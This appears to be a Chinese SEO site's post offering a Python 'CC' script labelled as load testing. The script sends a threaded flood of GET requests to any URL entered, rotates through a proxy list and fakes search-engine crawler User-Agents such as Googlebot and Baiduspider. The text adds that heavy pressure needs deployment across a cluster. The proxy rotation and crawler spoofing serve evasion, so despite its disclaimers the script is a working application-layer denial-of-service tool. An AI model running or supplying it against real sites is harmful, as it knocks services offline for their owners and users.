CC Python3 load-testing script

Usage

Put an ip.txt proxy pool file in the same directory as the script, with one HTTP/HTTPS proxy per line.
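
For reference, a minimal ip.txt might look like the following (one host:port entry per line; the script prefixes each entry with a scheme itself, and these addresses are placeholders, not working proxies):

192.0.2.10:8080
192.0.2.11:3128
198.51.100.7:8000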

Do not use this script for unauthorized testing. A single machine only generates limited load; significant pressure requires deploying it across a cluster.

pip3 install requests
python3 start.py

start.py:

import random
import requests
import concurrent.futures
import time
  
def generate_random_user_agent():
    # Pick a random crawler User-Agent string from a fixed list.
    browsers = [
        'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
        'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
        'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)',
        'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36; 360Spider',
        'Sosospider/(+http://help.soso.com/webspider.htm)',
        'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
        'Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)',
        'Mozilla/5.0 (compatible; Bytespider; https://zhanzhang.toutiao.com/) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36'
    ]
    return random.choice(browsers)
  
def simulate_access(url, user_agent, proxy):
    """Send a single GET request through the given proxy.

    Returns (success, elapsed_seconds); elapsed is None when the request fails.
    """
    proxies = {
        'http': f'http://{proxy}',
        'https': f'https://{proxy}',
    }
    headers = {
        'User-Agent': user_agent
    }
    try:
        response = requests.get(url, headers=headers, proxies=proxies, timeout=5)
        # response.elapsed is always populated once a response comes back
        return response.status_code == requests.codes.ok, response.elapsed.total_seconds()
    except requests.RequestException:
        return False, None
  
def load_proxies_from_file(file_path):
    """Read host:port proxy entries from a text file, skipping blank lines."""
    with open(file_path, 'r') as file:
        proxies = [line.strip() for line in file if line.strip()]
    return proxies
  
def main():
    print("""
    Laomao load-testing script -- do not misuse -- https://www.laomaoseo.vip/
    """)
    TARGET_URL = input("Target URL: ")
    concurrency = int(input("Concurrency (worker threads): "))
    duration = int(input("Test duration (seconds): "))
    proxy_file_path = input("Proxy file path (default: ip.txt): ") or 'ip.txt'

    start_time = time.time()
    success_count = 0
    failed_count = 0
    total_requests = 0
    total_time = 0
    all_results = []

    proxies = load_proxies_from_file(proxy_file_path)
    random.shuffle(proxies)

    with concurrent.futures.ThreadPoolExecutor(max_workers=concurrency) as executor:
        # Keep submitting requests until the time budget runs out. Tasks are
        # queued as fast as this loop spins, so all_results grows for the whole
        # duration; leaving the with-block waits for every pending task.
        while time.time() < start_time + duration:
            user_agent = generate_random_user_agent()
            proxy = random.choice(proxies)

            future = executor.submit(simulate_access, TARGET_URL, user_agent, proxy)
            all_results.append(future)
            total_requests += 1

    # Tally results once every worker has finished.
    for future in all_results:
        success, elapsed = future.result()
        if success:
            success_count += 1
            total_time += elapsed if elapsed is not None else 0
        else:
            failed_count += 1

    avg_time = total_time / success_count if success_count > 0 else 0

    print(f"Total requests:        {total_requests}")
    print(f"Successful requests:   {success_count}")
    print(f"Failed requests:       {failed_count}")
    print(f"Average response time: {avg_time:.2f}s")
  
if __name__ == "__main__":  
    main()